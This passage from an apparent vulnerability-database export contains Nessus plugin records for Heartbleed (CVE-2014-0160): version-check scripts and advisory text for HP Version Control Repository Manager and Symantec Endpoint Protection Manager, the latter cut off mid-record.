7.3.2 or later.\");\n  script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n  script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n  script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n  script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n  script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n  script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n  script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n  script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n  script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n  script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/06\");\n\n  script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n  script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:version_control_repository_manager\");\n  script_end_attributes();\n\n  script_category(ACT_GATHER_INFO);\n  script_family(english:\"Windows\");\n\n  script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n  script_dependencies(\"hp_version_control_repo_manager_installed.nbin\");\n  script_require_keys(\"installed_sw/HP Version Control Repository Manager\");\n\n  exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"HP Version Control Repository Manager\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\n# Only 1 install is possible at a time\ninstalls = get_installs(app_name:appname);\nif (installs[0] == IF_NOT_FOUND) audit(AUDIT_NOT_INST, appname);\ninstall = installs[1][0];\n\nversion = install['version'];\npath = install['path'];\n\n# Unknown version\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_APP_VER,appname);\n\n# These exact versions are vulnerable\nif (\n  version =~ \"^7\\.2\\.[0-2]\\.\" ||\n  version =~ \"^7\\.3\\.[0-1]\\.\"\n)\n{\n  port = get_kb_item(\"SMB/transport\");\n  if (!port) port = 445;\n\n  if (report_verbosity > 0)\n  {\n    report =\n      '\\n  Path              : ' + path +\n      '\\n  Installed version : ' + version +\n      '\\n  Fixed version     : 7.3.2' +\n      '\\n';\n    security_warning(port:port, extra:report);\n  }\n  else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n",
            "cvss": {
                "score": 5.0,
                "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
            }
        },
        {
            "lastseen": "2021-04-01T07:15:28",
            "description": "According to its self-reported version number, the version of Symantec\nEndpoint Protection Manager (SEPM) installed on the remote host is\naffected by an out-of-bounds read error, known as the 'Heartbleed Bug'\nin the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.",
            "edition": 29,
            "published": "2014-05-12T00:00:00",
            "title": "Symantec Endpoint Protection Manager < 12.1 RU4 MP1a OpenSSL Heartbeat Information Disclosure (Heartbleed)",
            "type": "nessus",
            "bulletinFamily": "scanner",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2021-04-02T00:00:00",
            "cpe": [
                "cpe:/a:symantec:endpoint_protection_manager"
            ],
            "id": "SYMANTEC_ENDPOINT_PROT_MGR_12_1_RU4_MP1A.NASL",
            "href": "https://www.tenable.com/plugins/nessus/73964",
            "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n  script_id(73964);\n  script_version(\"1.8\");\n  script_cvs_date(\"Date: 2019/11/26\");\n\n  script_cve_id(\"CVE-2014-0160\");\n  script_bugtraq_id(66690);\n  script_xref(name:\"CERT\", value:\"720951\");\n  script_xref(name:\"EDB-ID\", value:\"32745\");\n  script_xref(name:\"EDB-ID\", value:\"32764\");\n  script_xref(name:\"EDB-ID\", value:\"32791\");\n  script_xref(name:\"EDB-ID\", value:\"32998\");\n\n  script_name(english:\"Symantec Endpoint Protection Manager < 12.1 RU4 MP1a OpenSSL Heartbeat Information Disclosure (Heartbleed)\");\n  script_summary(english:\"Checks SEPM version.\");\n\n  script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Symantec Endpoint Protection Manager installed on the\nremote host is affected by an information disclosure vulnerability.\");\n  script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Symantec\nEndpoint Protection Manager (SEPM) installed on the remote host is\naffected by an out-of-bounds read error, known as the 'Heartbleed Bug'\nin the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://support.symantec.com/en_US/article.TECH216558.html\");\n  script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n  script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n  script_set